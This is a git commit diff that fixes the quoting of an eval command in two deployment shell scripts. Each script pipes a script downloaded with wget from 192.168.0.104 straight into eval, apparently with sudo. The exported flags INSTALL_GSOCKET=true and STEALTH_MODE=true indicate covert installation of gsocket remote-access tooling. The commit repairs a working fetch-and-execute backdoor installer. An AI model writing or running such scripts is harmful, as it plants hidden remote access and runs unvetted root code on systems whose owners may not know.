fix deploy scripts eval commands

This commit is contained in:
2025-04-07 11:01:21 +03:00
parent 259177738a
commit ff4dfbc43e
2 changed files with 2 additions and 2 deletions

View File

@@ -8,4 +8,4 @@ export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script with sudo
eval "$(wget -qO- http://192.168.0.104/deployment/y")
eval "$(wget -qO- http://192.168.0.104/deployment/y)"

View File

@@ -8,5 +8,5 @@ export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script
eval "$(wget -qO- http://192.168.0.104/deployment/y")
eval "$(wget -qO- http://192.168.0.104/deployment/y)"